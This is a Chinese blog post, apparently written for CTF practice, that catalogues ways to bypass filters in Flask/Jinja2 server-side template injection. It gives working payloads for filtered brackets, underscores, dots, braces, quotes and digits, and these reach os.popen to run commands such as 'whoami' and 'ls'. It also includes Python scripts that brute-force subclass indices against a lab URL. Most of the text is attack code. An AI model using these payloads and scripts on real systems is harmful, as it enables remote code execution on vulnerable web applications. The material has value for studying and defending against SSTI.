关于SSTI模块注入的常见绕过方法

简介: 关于SSTI模块注入的常见绕过方法

1、过滤了中括号

如下,我们可以正常读取object的所有子类

但是当我们尝试利用某个子类时,发现存在WAF,这里是中括号被过滤了

我们使用.pop() 函数来进行绕过

构造payload:

{{''.__class__.__base__.__subclasses__().pop(xx)}}

回显成功

用到脚本上同理

使用之前的脚本我们发现都被过滤了

简单修改后,便适用于中括号被过滤了的情况,这里是爆类的位置

关于爆函数位置各位可以参考我前面博客http://t.csdn.cn/7Ffkm给的脚本进行修改即可

import html
import requests
url='http://1.14.110.159:18080/flasklab/level/4'
def find_class_num():
    for i in range(500):
        parm_name='code'
        parm_value = "{{''.__class__.__base__.__subclasses__().pop(" + str(i) +")}}"
        data = {parm_name:parm_value}
        print(data)
        re = requests.post(url,data=data).text
        htmltest =html.unescape(re)
        print(htmltest)
        if '_frozen_importlib_external.FileLoader' in re:
            print(i)
            return i
find_class_num()

(当然并不通用,具体还是要看题目环境)

这里我们爆出存在 _frozen_importlib_external.FileLoader类,关于利用也请参考前面的博客

http://t.csdn.cn/IWlqA

2、过滤了双下划线

利用request.args(或者request.values)进行绕过

request.args是flask中的一个属性,为返回请求的参数,这里把class当作变量名,再将“__class__“”传给class即可

3、过滤了单下划线

使用dir(0)[0][0]或request['args']或request['values']进行绕过

4、过滤了点

我们可以利用 |attr 写成这种格式

{{''|attr('__class__')}}

也可写成这种

{{''['__class__']}}

5、过滤了大括号

使用{%%}来进行判断

eg:

{%if 2>1%}success{%endif%}

返回success说明执行成功,我们便可基于if语句构造payload

{% if ''.__class__.__base__.__subclasses__()[xx].__init__.__globals__['__builtins__']['eval']('__import__('os').popen('whoami').read()') %}success{%endif%}

相关脚本

import requests
url = "http://1.14.110.159:18080/flasklab/level/2"
for i in range(500):
    data = {
        "code": "{% if ''.__class__.__base__.__subclasses__()[" + str(i)+"].__init__.__globals__['__builtins__']['eval']('__import__('os').popen('whoami').read()') %}success{%endif%}"
    }#传入的参数,根据事实情况更改参数的名称
    try:
        re = requests.post(url=url,params=data).text
        if 'success' in re:
            print(re)
            print(i,data["code"])
            break
    except:
        pass

找到payload后,使用{%print()%}进行回显

{%print(''.__class__.__base__.__subclasses__()[xx].__init__.__globals__['__builtins__']['eval']('__import__('os').popen('whoami').read()'))%}
{%print(''.__class__.__base__.__subclasses__()[xx].__init__.__globals__['popen']('ls').read())%}

6、过滤了引号

同样也可以利用request.args属性进行绕过

7、过滤了数字

我们可以利用set 配合length设置一个变量等于某个数值

{% set a='aaaaaaa'|length%}{{a*a}}

在我们后面选择所要使用的子类位置时同样适用

{% set a='aaaaa'|length*'aaaa'|length%}{{a}}{{''.__class__.__base__.__subclasses__()[a]}}

当然这些都只是一些简单和常见的,实际题目中一般是混合过滤,而且还可能会禁用一些东西,

但是这些基础的东西和操作我们还是需要知道的。

目录
相关文章
|
存储 缓存 文件存储
如何保证分布式文件系统的数据一致性
分布式文件系统需要向上层应用提供透明的客户端缓存,从而缓解网络延时现象,更好地支持客户端性能水平扩展,同时也降低对文件服务器的访问压力。当考虑客户端缓存的时候,由于在客户端上引入了多个本地数据副本(Replica),就相应地需要提供客户端对数据访问的全局数据一致性。
32691 78
如何保证分布式文件系统的数据一致性
|
前端开发 容器
HTML5+CSS3前端入门教程---从0开始通过一个商城实例手把手教你学习PC端和移动端页面开发第8章FlexBox布局(上)
HTML5+CSS3前端入门教程---从0开始通过一个商城实例手把手教你学习PC端和移动端页面开发第8章FlexBox布局
17744 19
|
设计模式 存储 监控
设计模式(C++版)
看懂UML类图和时序图30分钟学会UML类图设计原则单一职责原则定义:单一职责原则,所谓职责是指类变化的原因。如果一个类有多于一个的动机被改变,那么这个类就具有多于一个的职责。而单一职责原则就是指一个类或者模块应该有且只有一个改变的原因。bad case:IPhone类承担了协议管理(Dial、HangUp)、数据传送(Chat)。good case:里式替换原则定义:里氏代换原则(Liskov 
36676 19
设计模式(C++版)
|
存储 编译器 C语言
抽丝剥茧C语言(初阶 下)(下)
抽丝剥茧C语言(初阶 下)
|
机器学习/深度学习 人工智能 自然语言处理
带你简单了解Chatgpt背后的秘密:大语言模型所需要条件(数据算法算力)以及其当前阶段的缺点局限性
带你简单了解Chatgpt背后的秘密:大语言模型所需要条件(数据算法算力)以及其当前阶段的缺点局限性
24754 14
|
机器学习/深度学习 弹性计算 监控
重生之---我测阿里云U1实例(通用算力型)
阿里云产品全线降价的一力作,2023年4月阿里云推出新款通用算力型ECS云服务器Universal实例,该款服务器的真实表现如何?让我先测为敬!
36658 15
重生之---我测阿里云U1实例(通用算力型)
|
SQL 存储 弹性计算
Redis性能高30%,阿里云倚天ECS性能摸底和迁移实践
Redis在倚天ECS环境下与同规格的基于 x86 的 ECS 实例相比,Redis 部署在基于 Yitian 710 的 ECS 上可获得高达 30% 的吞吐量优势。成本方面基于倚天710的G8y实例售价比G7实例低23%,总性价比提高50%;按照相同算法,相对G8a,性价比为1.4倍左右。
|
存储 算法 Java
【分布式技术专题】「分布式技术架构」手把手教你如何开发一个属于自己的限流器RateLimiter功能服务
随着互联网的快速发展,越来越多的应用程序需要处理大量的请求。如果没有限制,这些请求可能会导致应用程序崩溃或变得不可用。因此,限流器是一种非常重要的技术,可以帮助应用程序控制请求的数量和速率,以保持稳定和可靠的运行。
29835 52

热门文章

最新文章

下一篇
开通oss服务